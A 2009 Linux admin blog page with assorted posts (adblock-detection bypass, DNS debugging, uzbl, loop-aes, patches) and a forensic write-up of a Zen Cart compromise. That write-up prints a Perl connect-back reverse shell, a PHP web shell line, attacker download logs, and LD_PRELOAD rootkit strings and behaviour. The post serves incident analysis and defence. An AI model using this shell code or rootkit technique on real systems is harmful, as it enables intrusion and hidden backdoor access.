Into.the.Void.

If you have adblock enabled and you try to visit any url of www.archivum.info you will get a really nasty alert saying:

You Are Using Adblock Plus or some other advert blocking software! Archivum.info relies on advertising for revenue. Please add www.archivum.info to your ad blocking whitelist or disable ad blocking when you visit www.archivum.info.

When I first saw this I laughed…and then I tried to find a way to bypass it.
I used curl to see the sites html code:

$ curl -v www.archivum.info
curl -v www.archivum.info 
* About to connect() to www.archivum.info port 80 (#0)
*   Trying 69.147.224.162... connected
* Connected to www.archivum.info (69.147.224.162) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.19.5 (i486-pc-linux-gnu) libcurl/7.19.5 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15 libssh2/1.2
> Host: www.archivum.info
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 17 Nov 2009 11:24:22 GMT
< Server: Apache
< Last-Modified: Mon, 16 Nov 2009 08:41:17 GMT
< Accept-Ranges: bytes
< Content-Length: 9392
< Vary: Accept-Encoding
< Content-Type: text/html
< 
<html>
<head>
<title>archivum.info - The Internet archive.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">var disabled = false;</script><script type="text/javascript" src="http://www.archivum.info/js/adblocker_probe.js?
site=http://googlead.foobar.tld/"></script><script type="text/javascript">if (disabled == false) { location.replace("http://www.archivum.info/denied");
alert("You Are Using Adblock Plus or some other advert blocking software! Archivum.info relies on advertising
for revenue. Please add www.archivum.info to your ad blocking whitelist or disable ad blocking when you visit
www.archivum.info.");}</script></head>

[snip]

Here’s how this site blocks Adblockplus: there’s a variable called disabled set to “false” then if a js (http://www.archivum.info/js/adblocker_probe.js) runs it sets disabled to “true” . The hint is that adblockplus blocks urls starting with “googlead.” so it won’t visit “http://www.archivum.info/js/adblocker_probe.js?site=http://googlead.foobar.tld/” and the variable will remain “false“. Then the alert pops up.

The solution is very simple, just add an exception to your local AdblockPlus rules, AdblockPlus Preferences -> Add Filter:
@@|http://www.archivum.info/js/adblocker_probe.js?site=http://googlead.foobar.tld/

So firefox, visits the js url, disabled becomes “true” you are allowed to continue browsing the site and AdblockPlus continues blocking all blockable items.

Filed by kargig at 14:14 under Internet, Linux
Tags: adblock, adblockplus, alert, archivum.info, block ads, curl, firefox, javascript, Linux
No Comments | 704 views

For those who read my previous post, “Epic fail from a hosting company involving bad customer support and a critical security issue”
During the week some manager of the hosting company contacted the guy renting the servers and offered a free RAM upgrade for one server and a 60% monthly discount for 2 of the servers.

Not bad at all regarding the owner of the servers, but still I have many security related concerns about the hosting company

Filed by kargig at 23:55 under Linux
Tags: hosting, Linux, security
2 Comments | 1,294 views

That’s why I love ossec:

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/album_mod/..  /.../.log'.

 --END OF NOTIFICATION

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/language/lang_english/     /... /.log'.

 --END OF NOTIFICATION

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/language/     /... /.log'.

 --END OF NOTIFICATION

Just found this by copying some files for a client from his previous hosting company to one of the hosting servers of a company I work for.

There were actually 2 different sets of files.
The first one contained a tool that “hides” a process, called: “XH (XHide) process faker”, and the second one contained an iroffer executable.

Files:
i)xh-files.tar.gz
Listing:
.log/
.log/.crond/
.log/.crond/xh
.log/week~
.log/week

ii)iroffer-files.tar.gz
Listing:
.--/
.--/imd.pid
.--/imd.state.tmp
.--/imd.state
.--/linux

Mind the . (dot) of the directories containing the files.

Filed by kargig at 22:01 under Linux
Tags: iroffer, Linux, ossec, process hider, rootkit, security, vulnerability
2 Comments | 1,162 views

To cut the story as short as possible let’s say that someone rents some dedicated servers somewhere in a big hosting company. I occasionally do some administrative tasks for him.
A server stopped responding and was unbootable on October 1st, one disk had crashed, then the hosting company did a huge mistake, I notified them about it and then they did another even bigger mistake (security issue) on the next day, October 2nd. I re-notified them about it…
So you can either read the whole story or if you are only interested on the security issue, skip the first day and go straight to October 2nd.

Some details, the server had 2 disks, sda with the OS (Debian 4.0) with Plesk control panel and sdb which had some backup files.

October 1st 2009:
10:10 I got a telephone call to help on that server because it looked dead and it couldn’t even be rebooted from the hosting’s company control panel.
10:15 I contacted the company’s support by email and notified them of the problem.
(more…)

Filed by kargig at 13:29 under Linux
Tags: compromise, customer support, debian, fail, hard disk, Linux, lsattr, password, plesk, rootkit, security, shv4, shv5, trojan, ttyload, ttymon, vulnerability
5 Comments | 2,513 views

Lately I somehow bumped on the manpage of resolv.conf. While reading it I saw the following really nice option:

rotate               sets  RES_ROTATE  in _res.options, which causes round robin selection of name‐
                     servers from among those listed.  This has the effect of spreading  the  query
                     load  among  all  listed servers, rather than having all clients try the first
                     listed server first every time.

Since then my /etc/resolv.conf on both Gentoo and Debian looks like that:
nameserver 194.177.210.10
nameserver 194.177.210.210
nameserver 194.177.210.211
options rotate


(I prefer using GrNET’s DNS servers than any others in Greece, especially for my laptop configuration. Since they allow recursion I can use them to avoid lousy DNS services provided by lousy DSL routers regardless of the ISP I am currently using, when I am “mobile” with my laptop.)

While using the following config I issued a ping command on a teminal and a tcpdump command on another to see what was actually happening. The result looked like this:
root@lola:~# tcpdump -ni eth1 port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes
11:20:46.405694 IP 192.168.1.65.55154 > 194.177.210.210.53: 39212+ A? ntua.gr. (25)
11:20:46.444266 IP 194.177.210.210.53 > 192.168.1.65.55154: 39212* 1/5/8 A 147.102.222.210 (319)
11:20:46.484490 IP 192.168.1.65.56152 > 194.177.210.211.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.584171 IP 194.177.210.211.53 > 192.168.1.65.56152: 50452 ServFail 0/0/0 (46)
11:20:46.584449 IP 192.168.1.65.58597 > 194.177.210.10.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.624179 IP 194.177.210.10.53 > 192.168.1.65.58597: 50452 1/7/6 (357)
11:20:47.484420 IP 192.168.1.65.32818 > 194.177.210.10.53: 33179+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:47.524176 IP 194.177.210.10.53 > 192.168.1.65.32818: 33179 1/7/6 (357)
11:20:48.484483 IP 192.168.1.65.57670 > 194.177.210.210.53: 21949+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:48.524184 IP 194.177.210.210.53 > 192.168.1.65.57670: 21949 1/3/6 (271)
11:20:49.487610 IP 192.168.1.65.48966 > 194.177.210.211.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.534204 IP 194.177.210.211.53 > 192.168.1.65.48966: 8619 ServFail 0/0/0 (46)
11:20:49.534429 IP 192.168.1.65.49421 > 194.177.210.10.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.574138 IP 194.177.210.10.53 > 192.168.1.65.49421: 8619 1/7/6 (357)
11:20:50.494537 IP 192.168.1.65.52525 > 194.177.210.10.53: 3415+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:50.534145 IP 194.177.210.10.53 > 192.168.1.65.52525: 3415 1/7/6 (357)
11:20:51.494552 IP 192.168.1.65.40400 > 194.177.210.210.53: 4504+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:51.534205 IP 194.177.210.210.53 > 192.168.1.65.40400: 4504 1/3/6 (271)
11:20:52.494554 IP 192.168.1.65.42385 > 194.177.210.211.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.544197 IP 194.177.210.211.53 > 192.168.1.65.42385: 48450 ServFail 0/0/0 (46)
11:20:52.544409 IP 192.168.1.65.43773 > 194.177.210.10.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.584232 IP 194.177.210.10.53 > 192.168.1.65.43773: 48450 1/7/6 (357)


People who are used to reading tcpdump output will immediately point out the ServFail entries of the log. Server 194.177.210.211 refused to provide proper results for the PTR query of 210.222.102.147.in-addr.arpa.

Further investigation of the problem:

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.210
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 66841 IN  PTR achilles.noc.ntua.gr.

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.211
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.10
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 86115 IN  PTR achilles.noc.ntua.gr.

It was obvious that 2 out of 3 DNS servers responded as they should and the other did not.

What I did was to notify a friend working as an administrator there (GrNET) and let him know of the problem. After some investigation, he later on told me that the problem was related to dnssec issues. Possibly a configuration error on RIPE’s side. As far as I know they had to temporarily disable dnssec on the 147.102 zone…I am not aware whether they fixed the problem (using dnssec) yet though.

I am really glad they acted as fast as possible regarding the solution of the problem

Filed by kargig at 21:31 under Linux
Tags: debian, dns, dnssec, Gentoo, grnet, Linux, resolv.conf, rotate
3 Comments | 2,113 views

I’ve been trying uzbl for the last few days and I am pretty much impressed on how useful such a small application can be in certain usage cases!

I installed it on my Debian testing using the following blog post: Installing uzbl on Debian Squeeze .
Be sure to make install else you’ll have no config and uzbl will be unusable!!!

The first place I used it was for the urlLauncher plugin of urxvt. On my .Xdefaults I have the following piece of code:
urxvt.perl-ext-common: default,matcher,-option-popup,-selection-popup,-realine
urxvt.matcher.button: 1
urxvt.urlLauncher: /usr/local/bin/urxvt-url.sh

and my /usr/local/bin/urxvt-url.sh contains:
#!/bin/sh
uzbl "$1"

Now every url on the console get’s highlighted and I can open it with uzbl. And that means opening really fast!

Example:
urxvt terminal (tabbed by fluxbox) with some urls highlighted by the perl matcher plugin of urxvt:

left clicking on one of the urls opens it with uzbl:

Apart from that, I’ve started using uzbl to open links on instant messengers, IRC clients and in every other place that people send me simple links to check out or I need a fast browser instance. Some people might say that it looks like links2 graphical mode, but it’s NOT like opening urls with “links -G” because uzbl is based on webkit and that means it can deal with javascript, java, flash, whatever…

I just love the way you can keybind all the actions you want on it…on the example config that comes with it, you quit the browser by typing ZZ…how great is that ?

Some usage tips
1) Tabbed behavior (if you have fluxbox):
In ~/.config/uzbl/config add
bind t _ = spawn uzbl --uri %s
and in ~/.fluxbox/apps add the [group] tag before the [app] tag for uzbl like that:

[group]
 [app] (name=uzbl) (class=Uzbl)
  [Workspace]   {0} 
  [Head]    {0} 
  [Dimensions]  {800 1284}
  [Position]    (UPPERLEFT) {0 0}
  [Maximized]   {yes}
  [Jump]    {yes}
  [Close]   {yes}
[end]

Now the command t www.google.com inside uzbl, will open a new tabbed window of uzbl with www.google.com loaded in it.

2) Close uzbl window with ctrl+w
In ~/.config/uzbl/config add:

bind     ctrl+v ctrl+w    = exit

(press ctrl+v ctrl+w one after the other and you will get something like ^W in the file)

P.S. If you are a person that just came from the point and click windows world to the beautiful world of linux, or you are a person that loves bloated desktop managers like KDE/gnome/etc or bloated applications like firefox/iceweasel/konqueror don’t even think of installing it. You’ll never understand its value…
P.S.2. If Richard Stallman decided to browse the web and had an internet connection uzbl would probably be his browser of choice

Filed by kargig at 17:15 under Linux
Tags: browser, debian, firefox, fluxbox, iceweasel, lightweight, Linux, terminal, urxvt, uzbl
6 Comments | 2,166 views

Fast howto (mostly a note for personal use) on what’s needed on Debian to use an encrypted loop:

1. The necessary utilities (patched losetup)
# aptitude install loop-aes-utils
2. The necessary kernel-module
# aptitude install loop-aes-modules-2.6.30-1-686-bigmem
3. Create the keyfile (keep your computer as busy as possible while doing this to increase entropy)
# head -c 2925 /dev/urandom | uuencode -m - | head -n 66 | tail -n 65| gpg --symmetric -a >/path/to/keyfile.gpg
4. Loopfile creation (10Mb)
# dd if=/dev/urandom of=/my-encrypted-loop.aes bs=1k count=10000
5. Initialize loopfile
# losetup -K /path/to/keyfile.gpg -e AES256 /dev/loop5 /home/username/crypto-loop.img
6. Format loopfile
# mke2fs /dev/loop5
7. Delete loop device
# losetup -d /dev/loop5
8. Create mount point for loopfile
# mkdir /mnt/crypto-loop
9. Add entry to fstab

/home/username/crypto-loop.img /mnt/crypt-loop ext2 defaults,noauto,user,loop=/dev/loop7,encryption=AES256,gpgkey=/path/to/keyfile.gpg 0 0

10. Try mounting the loopfile as user
$ mount /mnt/crypto-loop
11. Check it’s mounted properly
$ mount | grep -i aes

and use it!

P.S. Secure your keyfile.gpg, if it gets lost you won’t _ever_ be able to decrypt what was inside crypto-loop.img!

Filed by kargig at 20:59 under Encryption, Linux
Tags: aes, debian, Encryption, gpg, Linux, loop, loop-aes
4 Comments | 6,951 views

Part 1: Finding the rootkit

It’s monday morning and I am for coffee in downtown Thessaloniki, a partner calls:
- On machine XXX mysqld is not starting since Saturday.
- Can I drink my coffee and come over later to check it ? Is it critical ?
- Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It’s a debian oldstable (etch) that runs apache2 with xoops CMS + zencart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mailserver…

I log in as root, I do a ps ax and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can’t see it running on ps so I try starting it via the init.d script. Nothing…it hangs while trying to get it started. I suspect a failing disk so I use tune2fs -C 50 /dev/hda1 to force an e2fck on boot and I reboot the machine. The box starts booting, it checks the fs, no errors found, it continues and hangs at starting mysqld. I break out of the process and am back at login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda, all clear, no errors found. Then I try to start mysqld manually, it looks like it starts but when I try to connect to it via a mysql client I get no response. I try to move /var/lib/mysql/ files to another location and to re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. Apt-get process tries to stop mysqld before it replaces it with the older version and it hangs, I try to break out of the process but it’s impossible…after a few killall -9 mysqld_safe;killall -9 mysql; killall -9 mysqladmin it finally moves on but when it tries to start the downgraded mysqld version it hangs once again. That’s totally weird…

I try to ldd /usr/sbin/mysqld and I notice a very strange library named /lib/ld-linuxv.so.1 in the output. I had never heard of that library name before so I google. Nothing comes up. I check on another debian etch box I have for the output of ldd /usr/sbin/mysqld and no library /lib/ld-linuxv.so.1 comes up. I am definitely watching something that it shouldn’t be there. And that’s a rootkit!

I ask some friends online but nobody has ever faced that library rootkit before. I try to find that file on the box but it’s nowhere to be seen inside /lib/…the rootkit hides itself pretty well. I can’t see it with ls /lib or echo /lib/*. The rootkit has probably patched the kernel functions that allow me to see it. Strangely though I was able to see it with ldd (more about the technical stuff on the second half of the post). I try to check on some other executables in /sbin with a for i in /usr/sbin/*;do ldd $i; done, all of them appear to have /lib/ld-linuxv.so.1 as a library dependency. I try to reboot the box with another kernel than the one it’s currently using but I get strange errors that it can’t even find the hard disk.

I try to downgrade the “working” kernel in an attempt of booting the box cleanly without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced of course. When apt-get procedure calls mkinitramfs in order to create the initramfs image I notice that there are errors saying that it can’t delete /tmp/mkinitramfs_UVWXYZ/lib/ld-linuxv.so.1 file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine at the time and that I should first get an image of the disk before I fiddle any more with it. So I shut the box down. I set up a new box with most of the services that should be running (mail + dns), so I had the option to check on the disk with the rootkit on my own time.

Part 2: Technical analysis
I. First look at the ld-linuxv.so.1 library

A couple of days later I put the disk to my box and made an image of each partition using dd:
dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:
mount -o loop /mnt/image/part1 /mnt/part1

A simple ls of /mnt/part1/lib/ revealed that ld-linuxv.so.1 was there. I run strings to it:
# strings /lib/ld-linuxv.so.1
__gmon_start__
_init
_fini
__cxa_finalize
_Jv_RegisterClasses
execve
dlsym
fopen
fprintf
fclose
puts
system
crypt
strdup
readdir64
strstr
__xstat64
__errno_location
__lxstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
vasprintf
getspnam_r
getspnam
getpwnam
pam_authenticate
inssh
gotpass
__libc_start_main
logit
setuid
setgid
seteuid
setegid
read
fwrite
accept
htons
doshell
doconnect
fork
dup2
stdout
fflush
stdin
fscanf
sleep
exit
waitpid
socket
libdl.so.2
libc.so.6
_edata
__bss_start
_end
GLIBC_2.0
GLIBC_2.1.3
GLIBC_2.1
root
@^_]
`^_]
ld.so.preload
ld-linuxv.so.1
_so_cache
execve
/var/opt/_so_cache/ld
%s:%s
Welcome master
crypt
readdir64
__xstat64
__lxstat64
opendir
login
pututline
open64
lastlog
pam_open_session
pam_close_session
syslog
getspnam_r
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
getspnam
getpwnam
root
/dev/null
normal
pam_authenticate
pam_get_item
Password:
__libc_start_main
/var/opt/_so_cache/lc
local
/usr/sbin/sshd
/bin/sh
read
write
accept
/usr/sbin/crond
HISTFILE=/dev/null
%99s
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
/bin/sh

As one can easily see there’s some sort of password hash inside and references to /usr/sbin/sshd, /bin/sh and setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted to the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) we thought that we had to do with a kernel rootkit. However, after carefully studying the disassembled dead listing of ld-linuxv.so.1, it became clear that it was a shared library based rootkit. Specifically, the intruder created the /etc/ld.so.preload file on the system with just one entry; the path of where he saved the ld-linuxv.so.1 shared library, namely /lib/ld-linuxv.so.1. This has the effect of preloading ld-linuxv.so.1 every single time a dynamically linked executable is run by a user. Using the well-known technique of dlsym(RTLD_NEXT, symbol), in which the run-time address of the symbol after the current library is returned to allow the creation of wrappers, the ld-linuxv.so.1 shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks and brief explanations of what some of them do:
crypt
readdir64
__xstat64
__l xstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
getspnam_r
getspnam
getpwnam
pam_authenticate
pam_get_item
__libc_start_main
read
write
accept

The hijacked accept() function sends a reverse, i.e. outgoing, shell to the IP address that initiated the incoming connection at port 80 only if the incoming IP address is a specific one. Afterwards it calls the original accept() system call. The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value (“$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0”). The hijacked read() and write() functions of the shared library wrap the corresponding system calls and if the current process is ssh (client or daemon), their buffers are appended to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the logs of the server. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn’t provide any outcome at first sight, nothing really striking out, but when I opened /mnt/part1/var/log/apache2/error.log.1 I faced these entries at the bottom:

–01:05:38– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
–01:05:51– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 18.61 MB/s

01:05:51 (18.61 MB/s) – `foobar.ext’ saved [695/695]

–01:17:14– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
–01:17:26– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 25.30 MB/s

01:17:26 (25.30 MB/s) – `foobar.ext’ saved [695/695]

So this was the entrance point. Someone got through a web app to the box and was able to run code.
I downloaded “foobar.ext” from the same url and it was a perl script.

#!/usr/bin/perl
# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source
# Code

use Socket;

print “[*] Dumping Arguments\n”;

$host = “A.B.C.D”;
$port = XYZ;

if ($ARGV[1]) {
$port = $ARGV[1];
}
print “[*] Connecting…\n”; $proto = getprotobyname(‘tcp’) || die(“[-] Unknown Protocol\n”);

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (“[-] Socket Error\n”);

my $target = inet_aton($host);

if (!connect(SERVER, pack “SnA4×8″, 2, $port, $target)) {
die(“[-] Unable to Connect\n”);
}
print “[*] Spawning Shell\n”;

if (!fork( )) {
open(STDIN,”>&SERVER”);
open(STDOUT,”>&SERVER”);
open(STDERR,”>&SERVER”);
exec {‘/bin/sh’} ‘-bash’ . “\0″ x 4;
exit(0);
}

Since I got the time when foobar.ext was downloaded I looked again at the apache2 access.log to see what was going on at the time.
Here are some entries:

A.B.C.D – - [15/Aug/2009:01:05:33 +0300] “GET http://www.domain.com/admin/ HTTP/1.1″ 302 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:34 +0300] “POST http://www.domain.com/admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1″ 200 303 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:34 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 131 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:38 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:47 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 52 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:50 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:51 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 59 “-” “Mozilla Firefox”

The second entry, with the POST looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This code allows running commands using the account of the user running the apache2 server.

Part 3: Conclusion and food for thought
To conclude on what happened:
1) The attacker used the zencart vulnerability to create the imagedisplay.php file.
2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.
3) Using the imagedisplay.php file he was able to run the server run foobar.ext which is a reverse shell. He could now connect to the machine.
4) Using some local exploit(s) he was probably able to become root.
5) Since he was root he uploaded/compiled ld-linuxv.so.1 and he created /etc/ld.so.preload. Now every executable would first load this “trojaned” library which allows him backdoor access to the box and is hidding from the system. So there is his rootkit

Fortunately the rootkit had problems and if /var/opt/_so_cache/ directory was not manually created it couldn’t write the lc and ld files inside it. If you created the _so_cache dir then it started logging.

If there are any more discoveries about the rootkit they will be posted in a new post. If someone else wants to analyze the rootkit I would be more than happy if he/she put a link to the analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the ld-linuxv.so.1 library and the perl script foobar.ext (Use at your own risk. Attacker’s host/ip have been removed from the perl script):linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs

Filed by kargig at 14:59 under Linux
Tags: apache2, audit, debian, etch, exploit, ld-linuxv, ld-linuxv.so.1, Linux, perl, record_company, rootkit, security, trojan, vulnerability, zen-cart, zencart
32 Comments | 15,424 views

Lately I noticed some image distortion appearing on some websites using my laptop with Debian squeeze. Menus on swiftfox did not appear as they should, some logos appeared out of their place and there were artifacts and other annoying things. For example Planet Gnome looked like this:

When using iceweasel 3.0.12 everything looked fine. Then I followed a guide to install Iceweasel 3.5 from experimental to my system. Images looked distorted again. So there must have been a problem with the latest xulrunner….

After some googling I bumped into Debian bug #491871 – [965GM EXA] display corruption with xulrunner 1.9. Following post #67 on that thread I was able to repair my xorg.conf to something that fixed the image distortion. Now Planet Gnome looks like this:

Some info:

# apt-cache policy iceweasel xserver-xorg-video-intel xulrunner-1.9.1
iceweasel:
Installed: 3.5.1-1
Candidate: 3.5.1-1
Version table:
*** 3.5.1-1 0
1 http://ftp.debian.org experimental/main Packages
100 /var/lib/dpkg/status
3.0.12-1 0
500 http://ftp.de.debian.org squeeze/main Packages
99 http://ftp.de.debian.org sid/main Packages
xserver-xorg-video-intel:
Installed: 2:2.3.2-2+lenny6
Candidate: 2:2.3.2-2+lenny6
Version table:
2:2.8.0-2 0
99 http://ftp.de.debian.org sid/main Packages
*** 2:2.3.2-2+lenny6 0
500 http://ftp.de.debian.org squeeze/main Packages
100 /var/lib/dpkg/status
xulrunner-1.9.1:
Installed: 1.9.1.1-2
Candidate: 1.9.1.1-2
Version table:
*** 1.9.1.1-2 0
1 http://ftp.debian.org experimental/main Packages
100 /var/lib/dpkg/status

Filed by kargig at 19:21 under Linux
Tags: 3.5, bug, bugzilla, debian, distortion, driver, exa, firefox, iceweasel, image, intel, Linux, problem, swiftfox, xaa, xorg
No Comments | 1,173 views

One of the things that good Linux applications should have is uniformity. Just like Mac OS X does. All applications should use the same keybindings to perform the same tasks. For example, on _every_ OS X application, in order to quit it you have to press “CMD+Q”, it’s that simple and everybody follows it. Everybody. On Linux though there are some applications that simply don’t care about uniformity. One of these applications is smplayer.

While it is almost standard for Linux applications to quit using Ctrl+Q, smplayer simply doesn’t have this option. It has the option of closing the current video with Ctrl+X but it doesn’t have the simple option of quitting using a keyboard shortcut.

So, the next (oneliner actually) patch does simply what I described above. It makes smplayer quit using “Ctrl+Q”.

The screenshot that shows what the patch does:

smplayer-0.6.8-quit.patch:
--- smplayer-0.6.8/src/baseguiplus.cpp 2009-08-13 16:07:04.000000000 +0300
+++ smplayer-0.6.8/src/baseguiplus.cpp 2009-08-13 16:08:22.000000000 +0300
@@ -67,8 +67,7 @@
tray->setToolTip( "SMPlayer" );
connect( tray, SIGNAL(activated(QSystemTrayIcon::ActivationReason)),
this, SLOT(trayIconActivated(QSystemTrayIcon::ActivationReason)));
-
- quitAct = new MyAction(this, "quit");
+ quitAct = new MyAction(QKeySequence("Ctrl+Q"), this, "quit");
connect( quitAct, SIGNAL(triggered()), this, SLOT(quit()) );
openMenu->addAction(quitAct);

And a patched ebuild for smplayer-0.6.8 to use this minor patch (only one line is added to the ebuild):
smplayer-0.6.8-r1.ebuild

P.S. Keybindings in smplayer can be set through Preferences, and someone could actually put Ctrl+Q as the quit shortcut but I think that this should be the default setting like most other applications have it. Uniformity matters.

Filed by kargig at 16:19 under Gentoo, Linux
Tags: bug, bugfix, ebuild, Gentoo, Linux, Mac, MacOSX, media player, patch, smplayer
5 Comments | 2,326 views

On my Macbook (4,1) I am currently using Debian with kernel 2.6.30-1-686-bigmem. This Macbook has Broadcom 4328 wireless chipset installed (02:00.0 Network controller: Broadcom Corporation BCM4328 802.11a/b/g/n (rev 03)) and unfortunately the necessary kernel module provided by Broadcom is pretty unstable. Or very unstable. Oh well…it’s totally unstable.

I had random freezes, usually when I first booted and tried to modprobe the module. After some searching around the net and a lot of experiments I’ve managed to create a kernel module that looks quite stable. At least I stopped getting any more lockups and freezes…To reproduce the module with the patches I’ve used follow the directions bellow step by step.

Find your kernel version:
mybox:~# uname -r
2.6.30-1-686-bigmem

Install kernel header files related to the kernel version you found (on the above example it is: 2.6.30-1-686-bigmem):
mybox:~# aptitude install linux-headers-2.6.30-1-686-bigmem

Remember to replace the version (2.6.30-1-6-bigmem) with the output of your mybox:~# uname -r

Create necessary dirs:
mybox:~# mkdir hybrid_wl
mybox:~# cd hybrid_wl

Download Linux drivers package from Broadcom:
802.11 Linux STA 32-bit Driver
(Driver info site: 802.11 Linux STA driver)
mybox:~/hybrid_wl# wget http://www.broadcom.com/docs/linux_sta/hybrid-portsrc-x86_32-v5_10_91_9.tar.gz

Download a few more patches from Archlinux and Gentoo:
hidden-essid patch
2.6.30 patch 1
2.6.30 patch 2
hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff
mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/hidden-essid.patch
mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/broadcom-sta-5.10.91.9-linux-2.6.30.patch
